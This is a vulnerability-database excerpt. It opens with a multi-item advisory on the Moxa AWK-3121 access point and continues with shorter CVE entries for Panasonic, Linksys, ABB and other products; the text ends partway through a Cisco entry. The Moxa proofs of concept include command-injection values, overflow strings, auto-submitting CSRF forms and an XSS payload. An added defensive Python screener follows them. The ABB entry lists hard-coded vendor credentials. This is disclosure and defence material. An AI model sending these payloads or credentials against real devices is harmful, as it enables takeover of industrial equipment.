------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
| VAR-201906-0790 | CVE-2018-10700 | Moxa AWK-3121 Cross-site scripting vulnerability in devices |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
An issue was discovered on Moxa AWK-3121 1.19 devices. It provides functionality so that an administrator can change the name of the device. However, the same functionality allows an attacker to execute XSS by injecting an XSS payload. The POST parameter "iw_board_deviceName" is susceptible to this injection. The Moxa AWK-3121 device contains a cross-site scripting vulnerability. Information may be obtained and information may be falsified. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. The 'iw_board_deviceName' parameter in Moxa AWK-3121 version 1.19 has a cross-site scripting vulnerability. The vulnerability stems from the lack of correct validation of client data in web applications. An attacker could exploit this vulnerability to execute client-side code.
The device by default allows HTTP traffic thus
providing an insecure communication mechanism for a user connecting to
the web server. This allows an attacker to sniff the traffic easily and
allows an attacker to compromise sensitive data such as credentials.
------------------------------------------
[VulnerabilityType Other]
HTTP traffic by default
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
2.
It is intended that an administrator can download /systemlog.log (the system
log).
------------------------------------------
[Additional Information]
POC
http://192.168.127.253//systemlog.log
------------------------------------------
[Vulnerability Type]
Incorrect Access Control
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can navigate to the URL and download the system log file without any authentication or authorization.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
3.
The session cookie "Password508" does not have an HttpOnly flag.
------------------------------------------
[VulnerabilityType Other]
Missing HttpOnly flag on session cookie
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can use a cross-site scripting attack to access the session cookie "Password508", which can allow the attacker to log in to the device.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
4.
It provides ping functionality so that an administrator
can execute ICMP calls to check if the network is working correctly. By crafting a packet that contains a string of
516 characters, it is possible for an attacker to execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/webSetPingTrace HTTP/1.1
Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
5.
The device provides a Wi-Fi connection that is open and does not use
any encryption mechanism by default. An administrator who uses the
open wireless connection to set up the device can allow an
attacker to sniff the traffic passing between the user's computer and the
device. This can allow an attacker to steal the credentials passing
over the HTTP connection as well as TELNET traffic. Also an attacker
can MITM the response and infect a user's computer very easily as
well.
------------------------------------------
[VulnerabilityType Other]
Open WiFi Connection
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK 3121 - 1.14
------------------------------------------
[Affected Component]
Device
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can monitor the Wi-Fi channels using Kismet or other
open-source software and a wireless card in monitor mode, and sniff all
the traffic, including HTTP traffic as well as SSH and Telnet traffic.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
6. By crafting
a packet that contains a string of 678 characters, it is
possible for an attacker to execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/web_SendTestEmail HTTP/1.1
Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK 3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
7. However, this interface is not protected against
CSRF attacks, which allows an attacker to trick an administrator into
executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and
forms/webSetMainRestart URIs.
------------------------------------------
[Additional Information]
POC to change name of the device
<html>
<body>
<form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" />
<input type="hidden" name="iw_board_deviceLocation" value="" />
<input type="hidden" name="iw_board_deviceDescription" value="" />
<input type="hidden" name="iw_board_deviceContactInfo" value="" />
<input type="hidden" name="Submit" value="Submit" />
<input type="hidden" name="bkpath" value="/sysinfo.asp " />
</form>
<script>
setTimeout("document.forms['f'].submit();",1);
</script>
</body>
</html>
<html>
<body>
<form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="SaveValue" value="1" />
</form>
<script>
setTimeout("document.forms['f'].submit();",1);
</script>
</body>
</html>
------------------------------------------
[Vulnerability Type]
Cross Site Request Forgery (CSRF)
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Escalation of Privileges]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can trick an administrator of the device into visiting an
attacker-controlled page while connected to the network, and thereby
change the password or any other setting.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
8.
The Moxa AWK 3121 provides ping functionality so that an administrator
can execute ICMP calls to check if the network is working correctly. By crafting a packet that contains shell metacharacters,
it is possible for an attacker to
execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/webSetPingTrace HTTP/1.1
Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
------------------------------------------
[VulnerabilityType Other]
Command injection in Ping functionality
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK 3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
9.
The device enables an unencrypted TELNET service by default. This allows an
attacker who has been able to gain a MITM position to easily sniff the
traffic between the device and the user. Also, an attacker can easily
connect to the TELNET daemon using the default credentials if they have
not been changed by the user.
------------------------------------------
[VulnerabilityType Other]
Insecure service Telnet enabled by default
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Telnet daemon
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
10.
The Moxa AWK 3121 provides certfile upload functionality so that an
administrator can upload a certificate file used for connecting to the
wireless network. By crafting a packet that contains shell metacharacters,
it is possible
for an attacker to execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/web_certUpload HTTP/1.1
Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962
Content-Disposition: form-data; name="iw_privatePass"
;`ping -c 9 192.168.127.103` ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1
... 114782935826962
Content-Disposition: form-data; name="certSection"
certWlan
... 114782935826962
Content-Disposition: form-data; name="rfindex"
0
... 114782935826962
Content-Disposition: form-data; name="Submit"
Submit
... 114782935826962
Content-Disposition: form-data; name="certFile1"
test.txt
... 114782935826962
Content-Disposition: form-data; name="certFile"; filename="blob"
Content-Type: text/xml
<a id="a"><b id="b">hey!</b></a>
... 114782935826962--
------------------------------------------
[VulnerabilityType Other]
Command injection in file upload
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
11.
------------------------------------------
[Additional Information]
POC
<html>
<body>
<form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" />
<input type="hidden" name="iw_board_deviceLocation" value="" />
<input type="hidden" name="iw_board_deviceDescription" value="" />
<input type="hidden" name="iw_board_deviceContactInfo" value="" />
<input type="hidden" name="Submit" value="Submit" />
<input type="hidden" name="bkpath" value="/sysinfo.asp " />
</form>
<script>
setTimeout("document.forms['f'].submit();",1);
</script>
</body>
</html>
------------------------------------------
[Vulnerability Type]
Cross Site Scripting (XSS)
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.9
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Escalation of Privileges]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
12. By crafting a packet that contains a string of
162 characters, it is possible for an attacker to execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/web_runScript HTTP/1.1
Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC"
Content-Type: application/octet-stream
ls -ltr
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_storage"
tftp
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_serverip"
`ping -c 3 192.168.127.101`
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp
... 7e21a62f2905ca--
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request and execute buffer overflow
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
13.
------------------------------------------
[Additional Information]
POC
<html>
<body>
<script>
function submitRequest()
{
var formData = new FormData();
formData.append("iw_filename", ";`ping -c 9 192.168.127.103` ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user
formData.append("certFile1", "test.txt");
// JavaScript file-like object
var content = '<a id="a"><b id="b">hey!</b></a>'; // the body of the new file...
var blob = new Blob([content], { type: "text/xml"});
formData.append("certFile", blob);
var request = new XMLHttpRequest();
request.open("POST", "http://192.168.127.253/forms/web_certUpload");
request.send(formData);
}
</script>
<form action="#">
<input type="submit" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
------------------------------------------
[VulnerabilityType Other]
Command injection in web runscript functionality
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
14. By crafting a packet that contains a string of
480 characters, it is possible for an attacker to execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/web_runScript HTTP/1.1
Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_filename"; filename="XXXX"
Content-Type: application/octet-stream
ls -ltr
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_storage"
tftp
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_serverip"
AAAAAAAAAAAAAAAAAA (etc.)
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp
... 7e21a62f2905ca--
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
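Items 4, 8, 10, 12, 13 and 14 above all abuse the same two weaknesses in the iw_webs form handlers: parameter values that reach a shell unfiltered, and values longer than the fixed buffers that receive them. The following is an added example, not code from the advisory or from Moxa, of a request-screening check that a reverse proxy or log reviewer in front of the device could apply; the endpoint and parameter names follow the advisory, while the length limits and the expected value formats are policy assumptions chosen for this example.

```python
"""Screen requests to the AWK-3121 web forms named in the advisory.

Added example, not code from the advisory or from Moxa.  The endpoint and
parameter names come from the advisory; the length limits and the value
format each parameter is expected to carry are assumptions for this example.
"""
import ipaddress
import re

# Endpoint -> {parameter: kind of value it should legitimately carry}.
ENDPOINT_POLICY = {
    "/forms/web_runScript": {"iw_filename": "filename", "iw_serverip": "ipv4"},
    "/forms/webSetPingTrace": {"srvName": "host"},
    "/forms/web_SendTestEmail": {"to1": "email"},
    "/forms/web_certUpload": {"iw_privatePass": "secret"},
}

# Generous upper bounds per kind (assumed policy).  All sit far below the
# 162/480/516/678-character values the advisory reports as overflowing the
# web server, so an over-long value is a strong overflow-attempt signal.
MAX_LEN = {"filename": 64, "ipv4": 15, "host": 128, "email": 128, "secret": 128}

# Characters that let a value break out of a shell command line, e.g. the
# ";`ping ...` ##" and "...;ping ...;##" payloads in items 8, 10 and 13.
SHELL_META = re.compile(r"[;&|`$<>\n\r]")
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
FILENAME_RE = re.compile(r"^[A-Za-z0-9._-]+$")


def is_ipv4(value: str) -> bool:
    try:
        ipaddress.IPv4Address(value)
        return True
    except ipaddress.AddressValueError:
        return False


def value_matches_kind(kind: str, value: str) -> bool:
    """Positive validation: does the value look like what the field expects?"""
    if kind == "ipv4":
        return is_ipv4(value)
    if kind == "host":
        return is_ipv4(value) or bool(HOSTNAME_RE.match(value))
    if kind == "email":
        return bool(EMAIL_RE.match(value))
    if kind == "filename":
        return bool(FILENAME_RE.match(value))
    return True  # "secret" is free-form: only length and metacharacters apply


def screen_request(path: str, params: dict) -> list:
    """Return (parameter, reason) findings for one request; [] means clean.

    Only parameters the advisory names for this endpoint are examined; the
    blocklist (metacharacters, length) and the allowlist (expected format)
    are both applied, so a payload that dodges one still trips the other.
    """
    findings = []
    for name, kind in ENDPOINT_POLICY.get(path, {}).items():
        value = params.get(name)
        if value is None:
            continue
        if len(value) > MAX_LEN[kind]:
            findings.append((name, f"length {len(value)} exceeds {MAX_LEN[kind]}"))
        if SHELL_META.search(value):
            findings.append((name, "shell metacharacters"))
        if not value_matches_kind(kind, value):
            findings.append((name, f"not a valid {kind}"))
    return findings


# Constructed sample requests modelled on the advisory's POCs plus one
# legitimate ping request; these are not captured traffic.
SAMPLE_REQUESTS = [
    ("/forms/web_runScript",
     {"iw_filename": ";`ping -c 9 192.168.127.103` ##",
      "iw_storage": "tftp", "iw_serverip": "192.168.1.101"}),                    # item 13
    ("/forms/web_runScript",
     {"iw_filename": "XXXX", "iw_storage": "tftp", "iw_serverip": "A" * 480}),    # item 14
    ("/forms/webSetPingTrace",
     {"srvName": "192.168.127.102;ping -c 8 192.168.127.101;##", "option": "0"}),  # item 8
    ("/forms/webSetPingTrace", {"srvName": "192.168.127.1", "option": "0"}),       # benign
]


def screen_all(requests=SAMPLE_REQUESTS) -> list:
    """Screen every sample request and return the per-request finding lists."""
    return [screen_request(path, params) for path, params in requests]


if __name__ == "__main__":
    for (path, _), findings in zip(SAMPLE_REQUESTS, screen_all()):
        print(path, "->", findings or "clean")
```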
| VAR-201906-0208 | CVE-2019-6530 | Panasonic FPWIN Pro Buffer error vulnerability |
CVSS V2: 6.8 CVSS V3: 7.8 Severity: HIGH |
Panasonic FPWIN Pro version 7.3.0.0 and prior allows attacker-created project files to be loaded by an authenticated user causing heap-based buffer overflows, which may lead to remote code execution. Panasonic FPWIN Pro contains a buffer error vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PRO files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Failed exploits may result in denial-of-service conditions.
Panasonic FPWIN Pro version 7.3.0.0 and prior versions are vulnerable; other versions may also be affected.
| VAR-201906-0209 | CVE-2019-6532 | Panasonic Control FPWIN Pro Project File Parsing sc_obj Type Confusion Remote Code Execution Vulnerability |
CVSS V2: 6.8 CVSS V3: 7.8 Severity: HIGH |
Panasonic FPWIN Pro version 7.3.0.0 and prior allows attacker-created project files to be loaded by an authenticated user, triggering incompatible type errors because the resource does not have the expected properties. This may lead to remote code execution. Panasonic FPWIN Pro contains an illegal type conversion vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Panasonic Control FPWin Pro. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PRO files. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the process. Failed exploits may result in denial-of-service conditions.
Panasonic FPWIN Pro version 7.3.0.0 and prior versions are vulnerable; other versions may also be affected.
| VAR-201906-0212 | CVE-2019-7311 | Linksys WRT1900ACS Cryptographic vulnerabilities in devices |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
An issue was discovered on Linksys WRT1900ACS 1.0.3.187766 devices. A lack of encryption in how the user login cookie (admin-auth) is stored on a victim's computer results in the admin password being discoverable by a local attacker, and usable to gain administrative access to the victim's router. The admin password is stored in base64 cleartext in an "admin-auth" cookie. An attacker sniffing the network at the time of login could acquire the router's admin password. Alternatively, gaining physical access to the victim's computer soon after an administrative login could result in compromise. The Linksys WRT1900ACS device contains cryptographic vulnerabilities. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Linksys WRT1900ACS is a wireless router from Linksys. In Linksys WRT1900ACS version 1.0.3.187766, there is an encryption vulnerability in the way the user login key is stored. The vulnerability stems from incorrect use of relevant cryptographic algorithms by network systems or products, resulting in improperly encrypted content, weak encryption, and storage of sensitive information in plain text.
| VAR-201906-1070 | CVE-2018-8047 | vtiger CRM Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
vtiger CRM 7.0.1 is affected by one reflected Cross-Site Scripting (XSS) vulnerability affecting version 7.0.1 and probably prior versions. This vulnerability could allow remote unauthenticated attackers to inject arbitrary web script or HTML via index.php?module=Contacts&view=List (app parameter). vtiger CRM contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. Vtiger CRM is a customer relationship management (CRM) system based on SugarCRM, developed by the American company Vtiger. The system provides functions such as management, collection, and analysis of customer information. The vulnerability stems from the lack of correct validation of client data in web applications. An attacker could exploit this vulnerability to execute client-side code.
| VAR-201906-1271 | No CVE | SoMachine HVAC has dll hijacking vulnerability |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
SoMachine HVAC is PLC programming software.
SoMachine HVAC has a DLL hijacking vulnerability when processing ppjs and ppjx files. Attackers can use this vulnerability to load malicious DLLs and execute malicious code.
| VAR-201906-0269 | CVE-2019-12762 | Xiaomi Mi 5s Plus Vulnerabilities related to authorization, authority, and access control in devices |
CVSS V2: 1.9 CVSS V3: 4.2 Severity: MEDIUM |
Xiaomi Mi 5s Plus devices allow attackers to trigger touchscreen anomalies via a radio signal between 198 kHz and 203 kHz, as demonstrated by a transmitter and antenna hidden just beneath the surface of a coffee-shop table, aka Ghost Touch. Xiaomi Mi 5s Plus devices have vulnerabilities related to authorization, permissions, and access control. Information may be tampered with. Xiaomi Mi 5s Plus is a smartphone from Xiaomi Technology (Xiaomi) of China.
There is a security hole in the Xiaomi Mi 5s Plus. Attackers can use a wireless signal between 198 kHz and 203 kHz to exploit this vulnerability and cause anomalies in the touch screen.
| VAR-201906-0397 | CVE-2019-6451 | SOYAL AR-727H and AR-829Ev5 Authentication vulnerabilities in devices |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
On SOYAL AR-727H and AR-829Ev5 devices, all CGI programs allow unauthenticated POST access. The SOYAL AR-727H and AR-829Ev5 devices contain an authentication vulnerability. Information may be tampered with. SOYAL AR-727H and SOYAL AR-829E are both display-type access controllers produced by the SOYAL Company of Taiwan, China. Authorization issue vulnerabilities exist in SOYAL AR-727H and AR-829E. This vulnerability stems from the lack of authentication measures or insufficient authentication strength in network systems or products.
| VAR-201906-0289 | CVE-2019-1880 | Cisco Unified Computing System C-Series Rack Server Vulnerabilities related to insufficient validation of data reliability |
CVSS V2: 2.1 CVSS V3: 4.4 Severity: MEDIUM |
A vulnerability in the BIOS upgrade utility of Cisco Unified Computing System (UCS) C-Series Rack Servers could allow an authenticated, local attacker to install compromised BIOS firmware on an affected device. The vulnerability is due to insufficient validation of the firmware image file. An attacker could exploit this vulnerability by executing the BIOS upgrade utility with a specific set of options. A successful exploit could allow the attacker to bypass the firmware signature-verification process and install compromised BIOS firmware on an affected device. Cisco Unified Computing System (UCS) C-Series Rack Server contains vulnerabilities related to insufficient validation of data reliability. Information may be tampered with. Cisco Unified Computing System Central Software is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions.
This issue is being tracked by Cisco Bug IDs CSCvp12824 and CSCvp12840.
| VAR-201906-0215 | CVE-2019-7225 | ABB HMI Vulnerability in using hard-coded credentials in components |
CVSS V2: 5.8 CVSS V3: 8.8 Severity: HIGH |
The ABB HMI components implement hidden administrative accounts that are used during the provisioning phase of the HMI interface. These credentials allow the provisioning tool "Panel Builder 600" to flash a new interface and Tags (MODBUS coils) mapping to the HMI. These credentials are the idal123 password for the IdalMaster account, and the exor password for the exor account. These credentials are used over both HTTP(S) and FTP. There is no option to disable or change these undocumented credentials. An attacker can use these credentials to log in to ABB HMI to read/write HMI configuration files and also to reset the device. This affects ABB CP635 HMI, CP600 HMIClient, Panel Builder 600, IDAL FTP server, IDAL HTTP server, and multiple other HMI components. ABB HMI components contain a vulnerability involving the use of hard-coded credentials. Information may be obtained, information may be altered, and a denial-of-service (DoS) condition may result. ABB PB610 is software designed by ABB of Switzerland for the graphical user interface of the CP600 control panel platform. Multiple ABB products are prone to a hard-coded credentials vulnerability.
An attacker can exploit this issue to gain unauthorized access to the affected application, obtain sensitive information, cause denial-of-service conditions or execute arbitrary code on the affected system. The following products and versions are affected: ABB CP620 with firmware version 1.76 and earlier; ABB CP620-Web with firmware version 1.76 and earlier; ABB CP630 with firmware version 1.76 and earlier; ABB CP630-Web with firmware version 1.76 and earlier; ABB CP635 with firmware version 1.76 and earlier; ABB CP635-B with firmware version 1.76 and earlier; ABB CP635-Web with firmware version 1.76 and earlier; ABB PB610 with firmware version 1.91 to 2.8.0.3674; ABB CP651-Web with firmware version 1.76 and earlier; ABB CP661 with firmware version 1.76 and earlier; ABB CP661-Web with firmware version 1.76 and earlier; ABB CP665-Web with firmware version 1.76 and earlier; ABB CP665 with firmware version 1.76 and earlier; ABB CP676-Web with firmware version 1.76 and earlier; ABB CP676 with firmware version 1.76 and earlier; ABB CP651 with firmware version 1.76 and earlier. Combining these actions can push malicious configuration and HMI code to the device.
Affected systems
----------------
CP620, order code: 1SAP520100R0001, revision index G1 with BSP UN31 V1.76 and prior
CP620, order code: 1SAP520100R4001, revision index G1 with BSP UN31 V1.76 and prior
CP620-WEB, order code: 1SAP520200R0001, revision index G1 with BSP UN31 V1.76 and prior
CP630, order code: 1SAP530100R0001, revision index G1 with BSP UN31 V1.76 and prior
CP630-WEB, order code: 1SAP530200R0001, revision index G1 with BSP UN31 V1.76 and prior
CP635, order code: 1SAP535100R0001, revision index G1 with BSP UN31 V1.76 and prior
CP635, order code: 1SAP535100R5001, revision index G1 with BSP UN31 V1.76 and prior
CP635-B, order code: 1SAP535100R2001, revision index G1 with BSP UN31 V1.76 and prior
CP635-WEB, order code: 1SAP535200R0001, revision index G1 with BSP UN31 V1.76 and prior
PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 ... 2.8.0.3674
CP651, order code: 1SAP551100R0001, revision index B1 with BSP UN30 V1.76 and prior
CP651-WEB, order code: 1SAP551200R0001, revision index A0 with BSP UN30 V1.76 and prior
CP661, order code: 1SAP561100R0001, revision index B1 with BSP UN30 V1.76 and prior
CP661-WEB, order code: 1SAP561200R0001, revision index A0 with BSP UN30 V1.76 and prior
CP665, order code: 1SAP565100R0001, revision index B1 with BSP UN30 V1.76 and prior
CP665-WEB, order code: 1SAP565200R0001, revision index A0 with BSP UN30 V1.76 and prior
CP676, order code: 1SAP576100R0001, revision index B1 with BSP UN30 V1.76 and prior
CP676-WEB, order code: 1SAP576200R0001, revision index A0 with BSP UN30 V1.76 and prior
Solution
--------
Apply the patches or changes recommended by the vendor in their vulnerability advisories:
- ABB CP635 HMI - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010376&LanguageCode=en&DocumentPartId=&Action=Launch
- ABB PB610 - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010377&LanguageCode=en&DocumentPartId=&Action=Launch
- ABB CP651 HMI - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010402&LanguageCode=en&DocumentPartId=&Action=Launch
Disclosure timeline
-------------------
04/02/2019 - Contacted ABB requesting disclosure coordination
05/02/2019 - Provided vulnerability details
05/06/2019 - Patch available
17/06/2019 - xen1thLabs public disclosure
| VAR-201906-0681 | CVE-2019-1842 | Cisco IOS XR Authorization vulnerabilities in software |
